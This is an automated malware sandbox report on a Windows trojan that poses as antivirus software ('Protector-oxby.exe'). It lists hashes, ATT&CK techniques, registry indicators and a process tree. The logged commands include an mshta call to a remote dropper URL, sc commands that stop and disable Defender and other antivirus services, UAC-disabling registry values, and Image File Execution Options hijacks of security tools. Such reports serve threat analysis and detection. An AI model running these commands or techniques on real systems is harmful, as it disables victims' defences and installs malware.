b76b2e9356507b2d1c8157c0f885592d27e8dc9c8d95e6024e041d758d94d5a1

Analysis

max time kernel
150s
max time network
147s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
19/06/2024, 20:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
Size

2.0MB
MD5

0077c2fd7e98b372a973640ebdb67bb4
SHA1

687f3783243b3da71d0cb882318224df3406a11c
SHA256

b76b2e9356507b2d1c8157c0f885592d27e8dc9c8d95e6024e041d758d94d5a1
SHA512

5866d2e329e5e7aff9e306af17c9cf7ddf7a4f47eb42f3473470af7ffb57af2c6473c1062f645369f050cb7852017f0d3dfbdabf84064c0508f77a6778d9e9aa
SSDEEP

49152:DLqatPmogbmVZBTN1xC05KRkgc68WJI5NeGu5dkpFpERe8JjVwv14x4Q:DbmHb0f1CRNRJuIGu5mpFpERe8s1i

Score

10^/10

evasion execution persistence trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://galaint.coolsecupdate.info/?0=112&1=8&2=1&3=33&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=hwktraryyo&14=1

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Protector-oxby.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	Protector-oxby.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Protector-oxby.exe

Disables taskbar notifications via registry modification
evasion

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luinit.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSkPck.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\inetlnfo.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mscman.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trickler.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hbsrv.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navw32.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsTray.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atro55en.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atwatch.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp32.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\driverctrl.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fixcfg.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setloadorder.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sweepnet.sweepsrv.sys.swnetsup.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atcon.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cv.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jedi.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PskSvc.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\crashrep.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ncinst4.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setupvameeval.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AlphaAV\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgserv9.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfiaudit.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfplogvw.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cleanpc.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wnt.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msbb.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mwatch.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avshadow.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\blss.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bpc.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\divx.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lordpe.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OAcat.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\poproxy.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexplorerv1.0.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\advxdwin.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgiproxy.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avkwctl9.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccevtmgr.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msa.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updat.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wrctrl.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xpdeluxe.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avnt.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oaview.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rcsync.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\signcheck.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\soap.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loader.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tbscan.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\personalguard.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\signcheck.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto-protect.nav80try.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dpfsetup.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gbn976rl.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iomon98.exe	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windows.exe	Protector-oxby.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nupgrade.exe\Debugger = "svchost.exe"	Protector-oxby.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oaui.exe	Protector-oxby.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 3 IoCs

pid	Process
1996	6884gab1kb8k3p1.exe
2660	l089d0966e530b3.exe
2620	Protector-oxby.exe

Loads dropped DLL 7 IoCs

pid	Process
840	0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
1996	6884gab1kb8k3p1.exe
1996	6884gab1kb8k3p1.exe
2660	l089d0966e530b3.exe
2660	l089d0966e530b3.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-oxby.exe"	Protector-oxby.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Protector-oxby.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\services.msc	Protector-oxby.exe
File opened for modification	C:\Windows\SysWOW64\eventvwr.msc	Protector-oxby.exe
File opened for modification	C:\Windows\SysWOW64\diskmgmt.msc	Protector-oxby.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1540	sc.exe
1664	sc.exe
1672	sc.exe
1904	sc.exe
1940	sc.exe
2308	sc.exe
1908	sc.exe
352	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312	Protector-oxby.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1"	Protector-oxby.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Protector-oxby.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Protector-oxby.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2660	l089d0966e530b3.exe
Token: SeShutdownPrivilege	2660	l089d0966e530b3.exe
Token: SeDebugPrivilege	2620	Protector-oxby.exe
Token: SeShutdownPrivilege	2620	Protector-oxby.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2660	l089d0966e530b3.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe
2620	Protector-oxby.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 840 wrote to memory of 1996	840	0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe	28
PID 840 wrote to memory of 1996	840	0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe	28
PID 840 wrote to memory of 1996	840	0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe	28
PID 840 wrote to memory of 1996	840	0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe	28
PID 840 wrote to memory of 1996	840	0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe	28
PID 840 wrote to memory of 1996	840	0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe	28
PID 840 wrote to memory of 1996	840	0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe	28
PID 1996 wrote to memory of 2660	1996	6884gab1kb8k3p1.exe	29
PID 1996 wrote to memory of 2660	1996	6884gab1kb8k3p1.exe	29
PID 1996 wrote to memory of 2660	1996	6884gab1kb8k3p1.exe	29
PID 1996 wrote to memory of 2660	1996	6884gab1kb8k3p1.exe	29
PID 1996 wrote to memory of 2660	1996	6884gab1kb8k3p1.exe	29
PID 1996 wrote to memory of 2660	1996	6884gab1kb8k3p1.exe	29
PID 1996 wrote to memory of 2660	1996	6884gab1kb8k3p1.exe	29
PID 2660 wrote to memory of 2620	2660	l089d0966e530b3.exe	30
PID 2660 wrote to memory of 2620	2660	l089d0966e530b3.exe	30
PID 2660 wrote to memory of 2620	2660	l089d0966e530b3.exe	30
PID 2660 wrote to memory of 2620	2660	l089d0966e530b3.exe	30
PID 2660 wrote to memory of 2620	2660	l089d0966e530b3.exe	30
PID 2660 wrote to memory of 2620	2660	l089d0966e530b3.exe	30
PID 2660 wrote to memory of 2620	2660	l089d0966e530b3.exe	30
PID 2660 wrote to memory of 2392	2660	l089d0966e530b3.exe	31
PID 2660 wrote to memory of 2392	2660	l089d0966e530b3.exe	31
PID 2660 wrote to memory of 2392	2660	l089d0966e530b3.exe	31
PID 2660 wrote to memory of 2392	2660	l089d0966e530b3.exe	31
PID 2660 wrote to memory of 2392	2660	l089d0966e530b3.exe	31
PID 2660 wrote to memory of 2392	2660	l089d0966e530b3.exe	31
PID 2660 wrote to memory of 2392	2660	l089d0966e530b3.exe	31
PID 2620 wrote to memory of 2524	2620	Protector-oxby.exe	33
PID 2620 wrote to memory of 2524	2620	Protector-oxby.exe	33
PID 2620 wrote to memory of 2524	2620	Protector-oxby.exe	33
PID 2620 wrote to memory of 2524	2620	Protector-oxby.exe	33
PID 2620 wrote to memory of 2524	2620	Protector-oxby.exe	33
PID 2620 wrote to memory of 2524	2620	Protector-oxby.exe	33
PID 2620 wrote to memory of 2524	2620	Protector-oxby.exe	33
PID 2620 wrote to memory of 1904	2620	Protector-oxby.exe	36
PID 2620 wrote to memory of 1904	2620	Protector-oxby.exe	36
PID 2620 wrote to memory of 1904	2620	Protector-oxby.exe	36
PID 2620 wrote to memory of 1904	2620	Protector-oxby.exe	36
PID 2620 wrote to memory of 1904	2620	Protector-oxby.exe	36
PID 2620 wrote to memory of 1904	2620	Protector-oxby.exe	36
PID 2620 wrote to memory of 1904	2620	Protector-oxby.exe	36
PID 2620 wrote to memory of 1940	2620	Protector-oxby.exe	37
PID 2620 wrote to memory of 1940	2620	Protector-oxby.exe	37
PID 2620 wrote to memory of 1940	2620	Protector-oxby.exe	37
PID 2620 wrote to memory of 1940	2620	Protector-oxby.exe	37
PID 2620 wrote to memory of 1940	2620	Protector-oxby.exe	37
PID 2620 wrote to memory of 1940	2620	Protector-oxby.exe	37
PID 2620 wrote to memory of 1940	2620	Protector-oxby.exe	37
PID 2620 wrote to memory of 1908	2620	Protector-oxby.exe	38
PID 2620 wrote to memory of 1908	2620	Protector-oxby.exe	38
PID 2620 wrote to memory of 1908	2620	Protector-oxby.exe	38
PID 2620 wrote to memory of 1908	2620	Protector-oxby.exe	38
PID 2620 wrote to memory of 1908	2620	Protector-oxby.exe	38
PID 2620 wrote to memory of 1908	2620	Protector-oxby.exe	38
PID 2620 wrote to memory of 1908	2620	Protector-oxby.exe	38
PID 2620 wrote to memory of 2308	2620	Protector-oxby.exe	41
PID 2620 wrote to memory of 2308	2620	Protector-oxby.exe	41
PID 2620 wrote to memory of 2308	2620	Protector-oxby.exe	41
PID 2620 wrote to memory of 2308	2620	Protector-oxby.exe	41
PID 2620 wrote to memory of 2308	2620	Protector-oxby.exe	41
PID 2620 wrote to memory of 2308	2620	Protector-oxby.exe	41
PID 2620 wrote to memory of 2308	2620	Protector-oxby.exe	41
PID 2620 wrote to memory of 352	2620	Protector-oxby.exe	42

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Protector-oxby.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Protector-oxby.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Protector-oxby.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	Protector-oxby.exe

C:\Users\Admin\AppData\Local\Temp\0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:840
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\6884gab1kb8k3p1.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\6884gab1kb8k3p1.exe" -e -p7lf02436t7m3i73
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1996
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\l089d0966e530b3.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\l089d0966e530b3.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2660
  - - C:\Users\Admin\AppData\Roaming\Protector-oxby.exe
      C:\Users\Admin\AppData\Roaming\Protector-oxby.exe
      4⤵
      UAC bypass
      Event Triggered Execution: Image File Execution Options Injection
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Checks whether UAC is enabled
      Drops file in System32 directory
      Modifies Internet Explorer settings
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:2620
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta.exe "http://galaint.coolsecupdate.info/?0=112&1=8&2=1&3=33&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=hwktraryyo&14=1"
        5⤵
        Modifies Internet Explorer settings
        
        PID:2524
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WinDefend
        5⤵
        Launches sc.exe
        
        PID:1904
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config WinDefend start= disabled
        5⤵
        Launches sc.exe
        
        PID:1940
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop msmpsvc
        5⤵
        Launches sc.exe
        
        PID:1908
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config msmpsvc start= disabled
        5⤵
        Launches sc.exe
        
        PID:2308
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config ekrn start= disabled
        5⤵
        Launches sc.exe
        
        PID:352
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop AntiVirService
        5⤵
        Launches sc.exe
        
        PID:1540
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config AntiVirService start= disabled
        5⤵
        Launches sc.exe
        
        PID:1672
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config AntiVirSchedulerService start= disabled
        5⤵
        Launches sc.exe
        
        PID:1664
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\L089D0~1.EXE" >> NUL
      4⤵
      PID:2392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

